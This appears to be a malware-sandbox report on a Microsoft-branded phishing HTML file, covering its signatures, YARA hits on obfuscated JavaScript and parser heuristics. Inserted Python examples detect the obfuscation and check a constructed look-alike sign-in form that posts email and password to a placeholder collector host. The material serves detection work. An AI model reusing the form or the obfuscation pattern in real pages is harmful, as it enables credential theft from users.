
Windows Analysis Report WireAdviceCopy.html

Overview

General Information

Sample Name:WireAdviceCopy.html
Analysis ID:502530
MD5:feac3fda3c48f172d010e11b72a559e0
SHA1:3e16ff04c51d5bb5ba2137d87f5b5a1ba72c22da
SHA256:1eb2818213e1f079ed7cf220a7eaf6f2400bf84b48a6c70cbac22eec827ab924

Most interesting Screenshot:

Detection

HTMLPhisher
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Phishing site detected (based on favicon image match)
Yara detected HtmlPhish10
Multi AV Scanner detection for submitted file
HTML document with suspicious title
HTML document with suspicious name
Phishing site detected (based on logo template match)
Phishing site detected (based on image similarity)
Yara signature match
Invalid 'forgot password' link found
None HTTPS page querying sensitive user data (password, username or email)
No HTML title found
JA3 SSL client fingerprint seen in connection with other malware
HTML body contains low number of good links
Invalid T&C link found
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 7004 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation 'C:\Users\user\Desktop\WireAdviceCopy.html' MD5: C139654B5C1438A95B321BB01AD63EF6)
    • chrome.exe (PID: 5080 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,16858165692460713401,16581068538360347648,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1940 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: WireAdviceCopy.html
Rule: SUSP_obfuscated_JS_obfuscatorio
Description: Detect JS obfuscation done by the js obfuscator (often malicious)
Author: @imp0rtp3
Strings:
  • 0x1b46:$c8: while(!![])
  • 0x1b64:$d1: parseInt(_0x3a4da2(0x82))/0x1*(parseInt(_0x3a4da2(0xa8))/0x2)+-parseInt(_0x3a4da2(0x7e))/0x3*(parseInt(_0x3a4da2(0x91))/0x4)+-parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-
  • 0x1b83:$d1: parseInt(_0x3a4da2(0xa8))/0x2)+-parseInt(_0x3a4da2(0x7e))/0x3*(parseInt(_0x3a4da2(0x91))/0x4)+-parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-parseInt(_0x3a4da2(0x72))/0x7+
  • 0x1ba3:$d1: parseInt(_0x3a4da2(0x7e))/0x3*(parseInt(_0x3a4da2(0x91))/0x4)+-parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-parseInt(_0x3a4da2(0x72))/0x7+parseInt(_0x3a4da2(0xa4))/0x8+
  • 0x1bc2:$d1: parseInt(_0x3a4da2(0x91))/0x4)+-parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-parseInt(_0x3a4da2(0x72))/0x7+parseInt(_0x3a4da2(0xa4))/0x8+parseInt(_0x3a4da2(0x86))/0x9+-
  • 0x1be2:$d1: parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-parseInt(_0x3a4da2(0x72))/0x7+parseInt(_0x3a4da2(0xa4))/0x8+parseInt(_0x3a4da2(0x86))/0x9+-parseInt(_0x3a4da2(0x7d))/0xa*(

Source: WireAdviceCopy.html
Rule: JoeSecurity_HtmlPhish_10
Description: Yara detected HtmlPhish_10
Author: Joe Security
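The two YARA strings quoted above are the fingerprint of obfuscator.io's string-array rotation prologue: $c8 is the `while(!![])` loop that keeps rotating the string array, and $d1 is the chain of `parseInt(_0x....(0x..))/0x..` terms it compares against a magic value. As an added example, not part of this report or of the @imp0rtp3 rule, the Python below approximates those two strings as regular expressions, prints hits in the report's `0x<offset>:$<tag>: <snippet>` form, and computes the MD5/SHA1/SHA256 the report keys on. The sample bytes are constructed to resemble the quoted strings and are not WireAdviceCopy.html; the regexes and the two-term verdict threshold are my own assumptions, not the rule's actual condition.

```python
import hashlib
import re

# Constructed sample modelled on the strings quoted in the report's YARA hits
# (an obfuscator.io string-array rotation prologue). It is NOT WireAdviceCopy.html.
SAMPLE_HTML = (
    b"<html><body><script>\n"
    b"var _0x1234=['a','b','c'];\n"
    b"var _0x3a4da2=function(_0x1){return _0x1234[_0x1];};\n"
    b"(function(_0x2f,_0x5e){while(!![]){try{"
    b"var _0x1a=parseInt(_0x3a4da2(0x82))/0x1*(parseInt(_0x3a4da2(0xa8))/0x2)"
    b"+-parseInt(_0x3a4da2(0x7e))/0x3;"
    b"if(_0x1a===_0x5e)break;else _0x2f['push'](_0x2f['shift']());}"
    b"catch(_0x4b){_0x2f['push'](_0x2f['shift']());}}}(_0x1234,0x1234));\n"
    b"</script></body></html>\n"
)

# Assumed regex approximations of the rule's $c8 and $d1 strings, plus the
# _0x-prefixed hex identifiers obfuscator.io emits. Not the rule's own text.
PATTERNS = {
    "c8": re.compile(rb"while\(!!\[\]\)"),
    "d1": re.compile(rb"parseInt\(_0x[0-9a-f]{4,6}\(0x[0-9a-f]+\)\)/0x[0-9a-f]+"),
    "ident": re.compile(rb"_0x[0-9a-f]{4,6}"),
}


def file_hashes(data: bytes) -> dict:
    """The three digests a sandbox report keys a sample on."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def scan(data: bytes) -> dict:
    """Return, per tag, the byte offsets at which the pattern matches."""
    return {tag: [m.start() for m in pat.finditer(data)] for tag, pat in PATTERNS.items()}


def report_lines(data: bytes, hits: dict, width: int = 40) -> list:
    """Render hits the way the report does: '0x<offset>:$<tag>: <snippet>'."""
    out = []
    for tag, offsets in hits.items():
        for off in offsets:
            snippet = data[off:off + width].decode("latin-1")
            out.append(f"0x{off:x}:${tag}: {snippet}")
    return out


def is_obfuscatorio(hits: dict) -> bool:
    """Assumed verdict: the self-rotating loop plus at least two parseInt/hex-divisor terms."""
    return bool(hits["c8"]) and len(hits["d1"]) >= 2


if __name__ == "__main__":
    found = scan(SAMPLE_HTML)
    for name, digest in file_hashes(SAMPLE_HTML).items():
        print(f"{name.upper()}: {digest}")
    for line in report_lines(SAMPLE_HTML, found):
        print("  ", line)
    print("obfuscator.io-style prologue:", is_obfuscatorio(found))
```

Run against a real capture by replacing SAMPLE_HTML with the file's bytes; the offsets printed are file offsets, comparable with the ones the report lists.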

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: WireAdviceCopy.html, Virustotal: Detection: 26%

Phishing:

Phishing site detected (based on favicon image match)
Source: file:///C:/Users/user/Desktop/WireAdviceCopy.html, Matcher: Template: microsoft matched with high similarity
Yara detected HtmlPhish10
Source: Yara match, File source: WireAdviceCopy.html, type: SAMPLE
Source: Yara match, File source: 96078.0.pages.csv, type: HTML
Phishing site detected (based on logo template match)
Source: file:///C:/Users/user/Desktop/WireAdviceCopy.html, Matcher: Template: microsoft matched
Phishing site detected (based on image similarity)
Source: file:///C:/Users/user/Desktop/WireAdviceCopy.html, Matcher: Found strong image similarity, brand: Microsoft, image: 96078.0.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
Invalid 'forgot password' link found
Source: file:///C:/Users/user/Desktop/WireAdviceCopy.html, HTTP Parser: Invalid link: Forgot my password
None HTTPS page querying sensitive user data (password, username or email)
Source: file:///C:/Users/user/Desktop/WireAdviceCopy.html, HTTP Parser: Has password / email / username input fields
No HTML title found
Source: file:///C:/Users/user/Desktop/WireAdviceCopy.html, HTTP Parser: HTML title missing
HTML body contains low number of good links
Source: file:///C:/Users/user/Desktop/WireAdviceCopy.html, HTTP Parser: Number of links: 0
Invalid T&C link found
Source: file:///C:/Users/user/Desktop/WireAdviceCopy.html, HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/WireAdviceCopy.html, HTTP Parser: Invalid link: Privacy & cookies
Source: file:///C:/Users/user/Desktop/WireAdviceCopy.html, HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/WireAdviceCopy.html, HTTP Parser: No <meta name="copyright".. found
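The HTTP Parser lines above are structural heuristics rather than content matches: the page asks for an email and a password, has no <title>, carries no <meta name="author"> or <meta name="copyright">, and every link a real sign-in page would wire up (Forgot my password, Terms of use, Privacy & cookies) goes nowhere, so the count of good links is 0. As an added example, not part of this report or of Joe Sandbox, the Python below reproduces those checks with the standard-library HTML parser over a constructed look-alike sign-in page (not the real sample). The list of sensitive input names, the definition of an "invalid" link and the non-HTTPS check on the form action are my assumptions about what such a parser should look for.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed look-alike sign-in page exhibiting the traits the report lists.
# It is NOT the real sample; the collector host is a placeholder.
SAMPLE_PAGE = """<!DOCTYPE html>
<html><head><meta charset="utf-8"></head>
<body>
<form method="post" action="http://collector.example.invalid/post.php">
  <input type="email" name="loginfmt" placeholder="Email, phone, or Skype">
  <input type="password" name="passwd">
  <a href="#">Forgot my password</a>
  <button type="submit">Sign in</button>
</form>
<footer>
  <a href="#">Terms of use</a>
  <a href="javascript:void(0)">Privacy &amp; cookies</a>
</footer>
</body></html>
"""

# Assumed lists of what counts as a credential field.
SENSITIVE_TYPES = {"password", "email"}
SENSITIVE_NAMES = {"passwd", "password", "loginfmt", "username", "user", "email"}


class PageFacts(HTMLParser):
    """Collect the few facts the heuristics below need."""

    def __init__(self):
        super().__init__()
        self.title = None
        self.links = []            # (href, visible text)
        self.meta_names = set()
        self.sensitive_inputs = []
        self.form_actions = []
        self._in_title = False
        self._link = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "title":
            self._in_title, self.title = True, ""
        elif tag == "a":
            self._link = [a.get("href"), ""]
        elif tag == "meta" and a.get("name"):
            self.meta_names.add(a["name"].lower())
        elif tag == "input":
            kind, name = a.get("type", "text").lower(), a.get("name", "").lower()
            if kind in SENSITIVE_TYPES or name in SENSITIVE_NAMES:
                self.sensitive_inputs.append((kind, name))
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "a" and self._link is not None:
            self.links.append((self._link[0], " ".join(self._link[1].split())))
            self._link = None

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        if self._link is not None:
            self._link[1] += data


def is_invalid_link(href):
    """A link that goes nowhere: missing, empty, '#' or a javascript: pseudo-URL."""
    if href is None:
        return True
    h = href.strip().lower()
    return h in ("", "#") or h.startswith("javascript:")


def analyse(html_text, page_scheme="file"):
    """Return the report-style findings for one page; page_scheme is the origin it was loaded from."""
    p = PageFacts()
    p.feed(html_text)
    p.close()
    findings = []
    if not p.title:
        findings.append("HTML title missing")
    if p.sensitive_inputs:
        findings.append("Has password / email / username input fields")
        # A relative form action inherits the page's scheme.
        insecure_post = any((urlparse(act).scheme or page_scheme) != "https" for act in p.form_actions)
        if page_scheme != "https" or insecure_post:
            findings.append("Non-HTTPS page querying sensitive user data")
    good = [href for href, _ in p.links if not is_invalid_link(href)]
    findings.append(f"Number of links: {len(good)}")
    findings.extend(f"Invalid link: {text}" for href, text in p.links if is_invalid_link(href))
    findings.extend(f'No <meta name="{m}".. found' for m in ("author", "copyright") if m not in p.meta_names)
    return findings


if __name__ == "__main__":
    for line in analyse(SAMPLE_PAGE):
        print("HTTP Parser:", line)
```

The default page_scheme of "file" mirrors the report, where the sample was opened from the desktop; pass "https" when analysing a page fetched from a live site so that only a non-HTTPS form action triggers the credential finding.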